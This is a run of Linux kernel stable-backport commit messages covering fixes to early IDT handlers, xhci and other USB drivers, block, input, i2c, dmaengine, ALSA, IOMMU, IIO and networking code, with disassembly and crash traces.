Clean up the code to generate the correct array stride (member size)
explicitly. This should be considerably more robust against
screw-ups, as GAS will warn if a .fill directive has a negative
count.  Using '. =' to advance would have been even more robust
(it would generate an actual error if it tried to move
backwards), but it would pad with nulls, confusing anyone who
tries to disassemble the code.  The new scheme should be much
clearer to future readers.

While we're at it, improve the comments and rename the array and
common code.

Binutils may start relaxing jumps to non-weak labels.  If so,
this change will fix our build, and we may need to backport this
change.

Before, on x86_64:

  0000000000000000 <early_idt_handlers>:
     0:   6a 00                   pushq  $0x0
     2:   6a 00                   pushq  $0x0
     4:   e9 00 00 00 00          jmpq   9 <early_idt_handlers+0x9>
                          5: R_X86_64_PC32        early_idt_handler-0x4
  ...
    48:   66 90                   xchg   %ax,%ax
    4a:   6a 08                   pushq  $0x8
    4c:   e9 00 00 00 00          jmpq   51 <early_idt_handlers+0x51>
                          4d: R_X86_64_PC32       early_idt_handler-0x4
  ...
   117:   6a 00                   pushq  $0x0
   119:   6a 1f                   pushq  $0x1f
   11b:   e9 00 00 00 00          jmpq   120 <early_idt_handler>
                          11c: R_X86_64_PC32      early_idt_handler-0x4

After:

  0000000000000000 <early_idt_handler_array>:
     0:   6a 00                   pushq  $0x0
     2:   6a 00                   pushq  $0x0
     4:   e9 14 01 00 00          jmpq   11d <early_idt_handler_common>
  ...
    48:   6a 08                   pushq  $0x8
    4a:   e9 d1 00 00 00          jmpq   120 <early_idt_handler_common>
    4f:   cc                      int3
    50:   cc                      int3
  ...
   117:   6a 00                   pushq  $0x0
   119:   6a 1f                   pushq  $0x1f
   11b:   eb 03                   jmp    120 <early_idt_handler_common>
   11d:   cc                      int3
   11e:   cc                      int3
   11f:   cc                      int3

Signed-off-by: Andy Lutomirski <luto@kernel.org>
Acked-by: H. Peter Anvin <hpa@linux.intel.com>
Cc: Binutils <binutils@sourceware.org>
Cc: Borislav Petkov <bp@alien8.de>
Cc: H.J. Lu <hjl.tools@gmail.com>
Cc: Jan Beulich <JBeulich@suse.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Link: http://lkml.kernel.org/r/ac027962af343b0c599cbfcf50b945ad2ef3d7a8.1432336324.git.luto@kernel.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

usb: make module xhci_hcd removable

commit b04c846ceaad42f9e37f3626c7e8f457603863f0 upstream.

Fixed regression. After commit 29e409f0f761 ("xhci: Allow xHCI drivers to
be built as separate modules") the module xhci_hcd became non-removable.
That behaviour is not expected and there're no notes about it in commit
message. The module should be removable as it blocks PM suspend/resume
functions (Debian Bug#666406).

Signed-off-by: Arthur Demchenkov <spinal.by@gmail.com>
Reviewed-by: Andrew Bresticker <abrestic@chromium.org>
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

usb: host: xhci: add mutex for non-thread-safe data

commit a00918d0521df1c7a2ec9143142a3ea998c8526d upstream.

Regression in commit 638139eb95d2 ("usb: hub: allow to process more usb
hub events in parallel")

The regression resulted in intermittent failure to initialise a 10-port
hub (with three internal VL812 4-port hub controllers) on boot, with a
failure rate of around 8%, due to multiple race conditions when
accessing addr_dev and slot_id in struct xhci_hcd.

This regression also exposed a problem with xhci_setup_device, which
"should be protected by the usb_address0_mutex" but no longer is due to

commit 6fecd4f2a58c ("USB: separate usb_address0 mutexes for each bus")

With separate buses (and locks) it is no longer the case that a single
lock will protect xhci_setup_device from accesses by two parallel
threads processing events on the two buses.

Fix this by adding a mutex to protect addr_dev and slot_id in struct
xhci_hcd, and by making the assignment of slot_id atomic.

Fixes multiple boot errors:

[ 0.583008] xhci_hcd 0000:00:14.0: Bad Slot ID 2
[ 0.583009] xhci_hcd 0000:00:14.0: Could not allocate xHCI USB device data structures
[ 0.583012] usb usb1-port3: couldn't allocate usb_device

And:

[ 0.637409] xhci_hcd 0000:00:14.0: Error while assigning device slot ID
[ 0.637417] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32.
[ 0.637421] usb usb1-port1: couldn't allocate usb_device

And:

[ 0.753372] xhci_hcd 0000:00:14.0: ERROR: unexpected setup context command completion code 0x0.
[ 0.753373] usb 1-3: hub failed to enable device, error -22
[ 0.753400] xhci_hcd 0000:00:14.0: Error while assigning device slot ID
[ 0.753402] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32.
[ 0.753403] usb usb1-port3: couldn't allocate usb_device

And:

[ 11.018386] usb 1-3: device descriptor read/all, error -110

And:

[ 5.753838] xhci_hcd 0000:00:14.0: Timeout while waiting for setup device command

Tested with 200 reboots, resulting in no USB hub init related errors.

Fixes: 638139eb95d2 ("usb: hub: allow to process more usb hub events in parallel")
Link: https://lkml.kernel.org/g/CAP-bSRb=A0iEYobdGCLpwynS7pkxpt_9ZnwyZTPVAoy0Y=Zo3Q@mail.gmail.com
Signed-off-by: Chris Bainbridge <chris.bainbridge@gmail.com>
[changed git commit description style for checkpatch -Mathias]
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

usb: dwc3: gadget: Fix incorrect DEPCMD and DGCMD status macros

commit 459e210c4fd034d20077bcec31fec9472a700fe9 upstream.

Fixed the incorrect macro definitions correctly as per databook.

Signed-off-by: Subbaraya Sundeep Bhatta <sbhatta@xilinx.com>
Fixes: b09bb64239c8 (usb: dwc3: gadget: implement Global Command support)
Signed-off-by: Felipe Balbi <balbi@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

USB: serial: ftdi_sio: Add support for a Motion Tracker Development Board

commit 1df5b888f54070a373a73b34488cc78c2365b7b4 upstream.

This adds support for new Xsens device, Motion Tracker Development Board,
using Xsens' own Vendor ID

Signed-off-by: Patrick Riphagen <patrick.riphagen@xsens.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

USB: cp210x: add ID for HubZ dual ZigBee and Z-Wave dongle

commit df72d588c54dad57dabb3cc8a87475d8ed66d806 upstream.

Added the USB serial device ID for the HubZ dual ZigBee
and Z-Wave radio dongle.

Signed-off-by: John D. Blair <johnb@candicontrols.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

block: discard bdi_unregister() in favour of bdi_destroy()

commit aad653a0bc09dd4ebcb5579f9f835bbae9ef2ba3 upstream.

bdi_unregister() now contains very little functionality.

It contains a "WARN_ON" if bdi->dev is NULL.  This warning is of no
real consequence as bdi->dev isn't needed by anything else in the function,
and it triggers if
   blk_cleanup_queue() -> bdi_destroy()
is called before bdi_unregister, which happens since
  Commit: 6cd18e711dd8 ("block: destroy bdi before blockdev is unregistered.")

So this isn't wanted.

It also calls bdi_set_min_ratio().  This needs to be called after
writes through the bdi have all been flushed, and before the bdi is destroyed.
Calling it early is better than calling it late as it frees up a global
resource.

Calling it immediately after bdi_wb_shutdown() in bdi_destroy()
perfectly fits these requirements.

So bdi_unregister() can be discarded with the important content moved to
bdi_destroy(), as can the
  writeback_bdi_unregister
event which is already not used.

Reported-by: Mike Snitzer <snitzer@redhat.com>
Fixes: c4db59d31e39 ("fs: don't reassign dirty inodes to default_backing_dev_info")
Fixes: 6cd18e711dd8 ("block: destroy bdi before blockdev is unregistered.")
Acked-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Acked-by: Dan Williams <dan.j.williams@intel.com>
Tested-by: Nicholas Moulin <nicholas.w.moulin@linux.intel.com>
Signed-off-by: NeilBrown <neilb@suse.de>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

block: fix ext_dev_lock lockdep report

commit 4d66e5e9b6d720d8463e11d027bd4ad91c8b1318 upstream.

=================================
[ INFO: inconsistent lock state ]
4.1.0-rc7+ #217 Tainted: G           O
---------------------------------
inconsistent {SOFTIRQ-ON-W} -> {IN-SOFTIRQ-W} usage.
swapper/6/0 [HC0[0]:SC1[1]:HE1:SE0] takes:
  (ext_devt_lock){+.?...}, at: [<ffffffff8143a60c>] blk_free_devt+0x3c/0x70
{SOFTIRQ-ON-W} state was registered at:
   [<ffffffff810bf6b1>] __lock_acquire+0x461/0x1e70
   [<ffffffff810c1947>] lock_acquire+0xb7/0x290
   [<ffffffff818ac3a8>] _raw_spin_lock+0x38/0x50
   [<ffffffff8143a07d>] blk_alloc_devt+0x6d/0xd0  <-- take the lock in process context
[..]
  [<ffffffff810bf64e>] __lock_acquire+0x3fe/0x1e70
  [<ffffffff810c00ad>] ? __lock_acquire+0xe5d/0x1e70
  [<ffffffff810c1947>] lock_acquire+0xb7/0x290
  [<ffffffff8143a60c>] ? blk_free_devt+0x3c/0x70
  [<ffffffff818ac3a8>] _raw_spin_lock+0x38/0x50
  [<ffffffff8143a60c>] ? blk_free_devt+0x3c/0x70
  [<ffffffff8143a60c>] blk_free_devt+0x3c/0x70    <-- take the lock in softirq
  [<ffffffff8143bfec>] part_release+0x1c/0x50
  [<ffffffff8158edf6>] device_release+0x36/0xb0
  [<ffffffff8145ac2b>] kobject_cleanup+0x7b/0x1a0
  [<ffffffff8145aad0>] kobject_put+0x30/0x70
  [<ffffffff8158f147>] put_device+0x17/0x20
  [<ffffffff8143c29c>] delete_partition_rcu_cb+0x16c/0x180
  [<ffffffff8143c130>] ? read_dev_sector+0xa0/0xa0
  [<ffffffff810e0e0f>] rcu_process_callbacks+0x2ff/0xa90
  [<ffffffff810e0dcf>] ? rcu_process_callbacks+0x2bf/0xa90
  [<ffffffff81067e2e>] __do_softirq+0xde/0x600

Neil sees this in his tests and it also triggers on pmem driver unbind
for the libnvdimm tests.  This fix is on top of an initial fix by Keith
for incorrect usage of mutex_lock() in this path: 2da78092dda1 "block:
Fix dev_t minor allocation lifetime".  Both this and 2da78092dda1 are
candidates for -stable.

Fixes: 2da78092dda1 ("block: Fix dev_t minor allocation lifetime")
Cc: Keith Busch <keith.busch@intel.com>
Reported-by: NeilBrown <neilb@suse.de>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Input: elantech - add new icbody type

commit 692dd1916436164e228608803dfb6cb768d6355a upstream.

This adds new icbody type to the list recognized by Elantech PS/2 driver.

Signed-off-by: Sam Hung <sam.hung@emc.com.tw>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Input: elantech - fix detection of touchpads where the revision matches a known rate

commit 5f0ee9d17aae628b22be86966471db65be21f262 upstream.

Make the check to skip the rate check more lax, so that it applies
to all hw_version 4 models.

This fixes the touchpad not being detected properly on Asus PU551LA
laptops.

Reported-and-tested-by: David Zafra Gómez <dezeta@klo.es>
Signed-off-by: Hans de Goede <hdegoede@redhat.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Input: synaptics - add min/max quirk for Lenovo S540

commit 7f2ca8b55aeff1fe51ed3570200ef88a96060917 upstream.

https://bugzilla.redhat.com/show_bug.cgi?id=1223051#c2

Tested-by: tommy.gagnes@gmail.com
Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Input: alps - do not reduce trackpoint speed by half

commit 088df2ccef75754cc16a6ba31829d23bcb2b68ed upstream.

On some v7 devices (e.g. Lenovo-E550) the deltas reported are typically
only in the 0-1 range dividing this by 2 results in a range of 0-0.

And even for v7 devices where this does not lead to making the trackstick
entirely unusable, it makes it twice as slow as before we added v7 support
and were using the ps/2 mouse emulation of the dual point setup.

If some kind of generic slowdown is actually necessary for some devices,
then that belongs in userspace, not in the kernel.

Reported-and-tested-by: Rico Moorman <rico.moorman@gmail.com>
Signed-off-by: Hans de Goede <hdegoede@redhat.com>
Reviewed-by: Benjamin Tissoires <benjamin.tissoires@gmail.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

i2c: s3c2410: fix oops in suspend callback for non-dt platforms

commit 8d487a43c36b54a029d74ad3b0a6a9d1253e728a upstream.

Initialize sysreg by default, otherwise driver will crash in suspend
callback when not using DT.

Signed-off-by: Vasily Khoruzhick <anarsoul@gmail.com>
Reviewed-by: Krzysztof Kozlowski <k.kozlowski@samsung.com>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Fixes: a7750c3ef01223 ("i2c: s3c2410: Handle i2c sys_cfg register in i2c driver")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

i2c: hix5hd2: Fix modalias to make module auto-loading work

commit 3e59ae4aa28237ced95413fbd46004b57c4da095 upstream.

Make the modalias match driver name, this is required to make module
auto-loading work.

Signed-off-by: Axel Lin <axel.lin@ingics.com>
Acked-by: Zhangfei Gao <zhangfei.gao@linaro.org>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

dmaengine: at_xdmac: lock fixes

commit 4c374fc7ce944024936a6d9804daec85207d9384 upstream.

Using _bh variant for spin locks causes this kind of warning:
Starting logging: ------------[ cut here ]------------
WARNING: CPU: 0 PID: 3 at /ssd_drive/linux/kernel/softirq.c:151
__local_bh_enable_ip+0xe8/0xf4()
Modules linked in:
CPU: 0 PID: 3 Comm: ksoftirqd/0 Not tainted 4.1.0-rc2+ #94
Hardware name: Atmel SAMA5
[<c0013c04>] (unwind_backtrace) from [<c00118a4>] (show_stack+0x10/0x14)
[<c00118a4>] (show_stack) from [<c001bbcc>]
(warn_slowpath_common+0x80/0xac)
[<c001bbcc>] (warn_slowpath_common) from [<c001bc14>]
(warn_slowpath_null+0x1c/0x24)
[<c001bc14>] (warn_slowpath_null) from [<c001e28c>]
(__local_bh_enable_ip+0xe8/0xf4)
[<c001e28c>] (__local_bh_enable_ip) from [<c01fdbd0>]
(at_xdmac_device_terminate_all+0xf4/0x100)
[<c01fdbd0>] (at_xdmac_device_terminate_all) from [<c02221a4>]
(atmel_complete_tx_dma+0x34/0xf4)
[<c02221a4>] (atmel_complete_tx_dma) from [<c01fe4ac>]
(at_xdmac_tasklet+0x14c/0x1ac)
[<c01fe4ac>] (at_xdmac_tasklet) from [<c001de58>]
(tasklet_action+0x68/0xb4)
[<c001de58>] (tasklet_action) from [<c001dfdc>]
(__do_softirq+0xfc/0x238)
[<c001dfdc>] (__do_softirq) from [<c001e140>] (run_ksoftirqd+0x28/0x34)
[<c001e140>] (run_ksoftirqd) from [<c0033a3c>]
(smpboot_thread_fn+0x138/0x18c)
[<c0033a3c>] (smpboot_thread_fn) from [<c0030e7c>] (kthread+0xdc/0xf0)
[<c0030e7c>] (kthread) from [<c000f480>] (ret_from_fork+0x14/0x34)
---[ end trace b57b14a99c1d8812 ]---

It comes from the fact that devices can called some code from the DMA
controller with irq disabled. _bh variant is not intended to be used in
this case since it can enable irqs. Switch to irqsave/irqrestore variant to
avoid this situation.

Signed-off-by: Ludovic Desroches <ludovic.desroches@atmel.com>
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

dmaengine: at_xdmac: rework slave configuration part

commit 765c37d876698268eea8b820081ac8fc9d0fc8bc upstream.

Rework slave configuration part in order to more report wrong errors
about the configuration.
Only maxburst and addr width values are checked when doing the slave
configuration. The validity of the channel configuration is done at
prepare time.

Signed-off-by: Ludovic Desroches <ludovic.desroches@atmel.com>
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

dmaengine: Fix choppy sound because of unimplemented resume

commit 88d04643c66052a1cf92a6fd5f92dff0f7757f61 upstream.

Some drivers implement only pause operation (no resuming). Example is
pl330 where pause is needed for getting residuum. pl330 does not support
resume operation, transfer must be stopped after pause.

However for slaves this is exposed always as "pause and resume" which
introduces subtle errors on Odroid U3 board (Exynos4412 with pl330).
After adding pause function to pl330 driver the audio playback
(utilizing DMA) gets choppy after some time (approximately 24 hours).

Fix this by exposing "cmd_pause" if and only if pause and resume are
implemented.

Signed-off-by: Krzysztof Kozlowski <k.kozlowski@samsung.com>
Reported-by: gabriel@unseen.is
Reported-by: Marek Szyprowski <m.szyprowski@samsung.com>
Fixes: 88987d2c7534 ("dmaengine: pl330: add DMA_PAUSE feature")
Acked-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

dmaengine: pl330: Fix hang on dmaengine_terminate_all on certain boards

commit 81cc6edc08705ac0146fe6ac14a0982a31ce6f3d upstream.

The pl330 device could hang infinitely on certain boards when DMA
channels are terminated.

It was caused by lack of runtime resume when executing
pl330_terminate_all() which calls the _stop() function. _stop() accesses
device register and can loop infinitely while checking for device state.

The hang was confirmed by Dinh Nguyen on Altera SOCFPGA Cyclone V
board during boot. It can be also triggered with:

$ echo 1 > /sys/module/dmatest/parameters/iterations
$ echo dma1chan0 > /sys/module/dmatest/parameters/channel
$ echo 1 > /sys/module/dmatest/parameters/run
$ sleep 1
$ cat /sys/module/dmatest/parameters/run

Reported-by: Dinh Nguyen <dinguyen@opensource.altera.com>
Signed-off-by: Krzysztof Kozlowski <k.kozlowski@samsung.com>
Fixes: ae43b3289186 ("ARM: 8202/1: dmaengine: pl330: Add runtime Power Management support v12")
Tested-by: Dinh Nguyen <dinguyen@opensource.altera.com>
Signed-off-by: Vinod Koul <vinod.koul@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ALSA: usb-audio: add native DSD support for JLsounds I2SoverUSB

commit 3b7e5c7e36ed4a046bbea6d36c9be9d1d6107ae0 upstream.

This patch adds native DSD support for the XMOS based JLsounds I2SoverUSB board

Signed-off-by: Jurgen Kramer <gtmkramer@xs4all.nl>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ALSA: usb-audio: fix missing input volume controls in MAYA44 USB(+)

commit ea114fc27dc0cb9a550b6add5426720feb66262a upstream.

The driver worked around an error in the MAYA44 USB(+)'s mixer unit
descriptor by aborting before parsing the missing field. However,
aborting parsing too early prevented parsing of the other units
connected to this unit, so the capture mixer controls would be missing.

Fix this by moving the check for this descriptor error after the parsing
of the unit's input pins.

Reported-by: nightmixes <nightmixes@gmail.com>
Tested-by: nightmixes <nightmixes@gmail.com>
Signed-off-by: Clemens Ladisch <clemens@ladisch.de>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ALSA: usb-audio: add MAYA44 USB+ mixer control names

commit 044bddb9ca8d49edb91bc22b9940a463b0dbb97f upstream.

Add mixer control names for the ESI Maya44 USB+ (which appears to be
identical width the AudioTrak Maya44 USB).

Reported-by: nightmixes <nightmixes@gmail.com>
Signed-off-by: Clemens Ladisch <clemens@ladisch.de>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ALSA: usb-audio: don't try to get Outlaw RR2150 sample rate

commit 2f80b2958abe5658000d5ad9b45a36ecf879666e upstream.

This quirk allows us to avoid the noisy:

current rate 0 is different from the runtime rate

message every time playback starts. While USB DAC in the RR2150
supports reading the sample rate, it never returns a sample rate
other than zero in my observation with common sample rates.

Signed-off-by: Eric Wong <normalperson@yhbt.net>
Cc: Joe Turner <joe@oampo.co.uk>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ALSA: usb-audio: Add mic volume fix quirk for Logitech Quickcam Fusion

commit 1ef9f0583514508bc93427106ceef3215e4eb1a5 upstream.

Fix this from the logs:

usb 7-1: New USB device found, idVendor=046d, idProduct=08ca
...
usb 7-1: Warning! Unlikely big volume range (=3072), cval->res is probably wrong.
usb 7-1: [5] FU [Mic Capture Volume] ch = 1, val = 4608/7680/1

Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ALSA: hda/realtek - Add a fixup for another Acer Aspire 9420

commit b5d724b1add6eabf3aa7276ab3454ea9f45eebd3 upstream.

Acer Aspire 9420 with ALC883 (1025:0107) needs the fixup for EAPD to
make the sound working like other Aspire models.

Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=94111
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iommu/vt-d: Fix passthrough mode with translation-disabled devices

commit 4ed6a540fab8ea4388c1703b73ecfed68a2009d1 upstream.

When we use 'intel_iommu=igfx_off' to disable translation for the
graphics, and when we discover that the BIOS has misconfigured the DMAR
setup for I/OAT, we use a special DUMMY_DEVICE_DOMAIN_INFO value in
dev->archdata.iommu to indicate that translation is disabled.

With passthrough mode, we were attempting to dereference that as a
normal pointer to a struct device_domain_info when setting up an
identity mapping for the affected device.

This fixes the problem by making device_to_iommu() explicitly check for
the special value and indicate that no IOMMU was found to handle the
devices in question.

Signed-off-by: David Woodhouse <David.Woodhouse@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iommu/vt-d: Allow RMRR on graphics devices too

commit 18436afdc11a00ac881990b454cfb2eae81d6003 upstream.

Commit c875d2c1 ("iommu/vt-d: Exclude devices using RMRRs from IOMMU API
domains") prevents certain options for devices with RMRRs. This even
prevents those devices from getting a 1:1 mapping with 'iommu=pt',
because we don't have the code to handle *preserving* the RMRR regions
when moving the device between domains.

There's already an exclusion for USB devices, because we know the only
reason for RMRRs there is a misguided desire to keep legacy
keyboard/mouse emulation running in some theoretical OS which doesn't
have support for USB in its own right... but which *does* enable the
IOMMU.

Add an exclusion for graphics devices too, so that 'iommu=pt' works
there. We should be able to successfully assign graphics devices to
guests too, as long as the initial handling of stolen memory is
reconfigured appropriately. This has certainly worked in the past.

Signed-off-by: David Woodhouse <David.Woodhouse@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

n_tty: Fix auditing support for cannonical mode

commit 72586c6061ab8c23ffd9f301ed19782a44ff5f04 upstream.

Commit 32f13521ca68bc624ff6effc77f308a52b038bf0
("n_tty: Line copy to user buffer in canonical mode")
changed cannonical mode copying to use copy_to_user
but missed adding the call to the audit framework.
Add in the appropriate functions to get audit support.

Fixes: 32f13521ca68 ("n_tty: Line copy to user buffer in canonical mode")
Reported-by: Miloslav Trmač <mitr@redhat.com>
Signed-off-by: Laura Abbott <labbott@fedoraproject.org>
Reviewed-by: Peter Hurley <peter@hurleysoftware.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drivers/base: cacheinfo: handle absence of caches

commit 3370e13aa463adb84488ebf0e599e3dc0024315b upstream.

On some simulators like GEM5, caches may not be simulated. In those
cases, the cache levels and leaves will be zero and will result in
following exception:

Unable to handle kernel NULL pointer dereference at virtual address 0040
pgd = ffffffc0008fa000
[00000040] *pgd=00000009f6807003, *pud=00000009f6807003,
*pmd=00000009f6808003, *pte=006000002c010707
Internal error: Oops: 96000005 [#1] PREEMPT SMP
Modules linked in:
CPU: 1 PID: 1 Comm: swapper/0 Not tainted 4.1.0-rc5 #198
task: ffffffc9768a0000 ti: ffffffc9768a8000 task.ti: ffffffc9768a8000
PC is at detect_cache_attributes+0x98/0x2c8
LR is at detect_cache_attributes+0x88/0x2c8

kcalloc(0) returns a special value ZERO_SIZE_PTR which is non-NULL value
but results in fault only on any attempt to dereferencing it. So
checking for the non-NULL pointer will not suffice.

This patch checks for non-zero cache leaf nodes and returns error if
there are no cache leaves in detect_cache_attributes.

Cc: Will Deacon <will.deacon@arm.com>
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Reported-by: William Wang <william.wang@arm.com>
Signed-off-by: Sudeep Holla <sudeep.holla@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iio: adis16400: Fix burst transfer for adis16448

commit d046ba268adb87c7780494ecf897cbafbf100d57 upstream.

The adis16448, unlike the other chips in this family, in addition to the
hardware channels also sends out the DIAG_STAT register in burst mode
before them. Handle that case by skipping over the first 2 bytes before we
pass the received data to the buffer.

Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Fixes: 76ada52f7f5d ("iio:adis16400: Add support for the adis16448")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iio: adis16400: Fix burst mode

commit 9df560350c90f3d3909fe653399b3584c9a17b61 upstream.

There are a few issues with the burst mode support. For one we don't setup
the rx buffer, so the buffer will never be filled and all samples will read
as the zero. Furthermore the tx buffer has the wrong type, which means the
driver sends the wrong command and not the right data is returned.

The final issue is that in burst mode all channels are transferred. Hence
the length of the transfer length should be the number of hardware
channels * 2 bytes. Currently the driver uses indio_dev->scan_bytes for
this. But if the timestamp channel is enabled the scan_bytes will be larger
than the burst length. Fix this by just calculating the burst length based
on the number of hardware channels.

Signed-off-by: Paul Cercueil <paul.cercueil@analog.com>
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Fixes: 5eda3550a3cc ("staging:iio:adis16400: Preallocate transfer message")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iio: adis16400: Compute the scan mask from channel indices

commit c2a8b623a089d52c199e305e7905829907db8ec8 upstream.

We unfortunately can't use ~0UL for the scan mask to indicate that the
only valid scan mask is all channels selected. The IIO core needs the exact
mask to work correctly and not a super-set of it. So calculate the masked
based on the channels that are available for a particular device.

Signed-off-by: Paul Cercueil <paul.cercueil@analog.com>
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Fixes: 5eda3550a3cc ("staging:iio:adis16400: Preallocate transfer message")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iio: adis16400: Use != channel indices for the two voltage channels

commit 7323d59862802ca109451eeda9777024a7625509 upstream.

Previously, the two voltage channels had the same ID, which didn't cause
conflicts in sysfs only because one channel is named and the other isn't;
this is still violating the spec though, two indexed channels should never
have the same index.

Signed-off-by: Paul Cercueil <paul.cercueil@analog.com>
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iio: adis16400: Report pressure channel scale

commit 69ca2d771e4e709c5ae1125858e1246e77ef8b86 upstream.

Add the scale for the pressure channel, which is currently missing.

Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Fixes: 76ada52f7f5d ("iio:adis16400: Add support for the adis16448")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

iio: adc: twl6030-gpadc: Fix modalias

commit e5d732186270e0881f47d95610316c0614b21c3e upstream.

Remove extra space between platform prefix and DRIVER_NAME in MODULE_ALIAS.

Signed-off-by: Axel Lin <axel.lin@ingics.com>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

netlink: Disable insertions/removals during rehash

[ Upstream commit: Not applicable ]

The current rhashtable rehash code is buggy and can't deal with
parallel insertions/removals without corrupting the hash table.

This patch disables it by partially reverting
c5adde9468b0714a051eac7f9666f23eb10b61f7 ("netlink: eliminate
nl_sk_hash_lock").

Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

bridge: disable softirqs around br_fdb_update to avoid lockup

[ Upstream commit c4c832f89dc468cf11dc0dd17206bace44526651 ]

br_fdb_update() can be called in process context in the following way:
br_fdb_add() -> __br_fdb_add() -> br_fdb_update() (if NTF_USE flag is set)
so we need to disable softirqs because there are softirq users of the
hash_lock. One easy way to reproduce this is to modify the bridge utility
to set NTF_USE, enable stp and then set maxageing to a low value so
br_fdb_cleanup() is called frequently and then just add new entries in
a loop. This happens because br_fdb_cleanup() is called from timer/softirq
context. The spin locks in br_fdb_update were _bh before commit f8ae737deea1
("[BRIDGE]: forwarding remove unneeded preempt and bh diasables")
and at the time that commit was correct because br_fdb_update() couldn't be
called from process context, but that changed after commit:
292d1398983f ("bridge: add NTF_USE support")
Using local_bh_disable/enable around br_fdb_update() allows us to keep
using the spin_lock/unlock in br_fdb_update for the fast-path.

Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Fixes: 292d1398983f ("bridge: add NTF_USE support")
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

be2net: Replace dma/pci_alloc_coherent() calls with dma_zalloc_coherent()

[ Upstream commit e51000db4c880165eab06ec0990605f24e75203f ]

There are several places in the driver (all in control paths) where
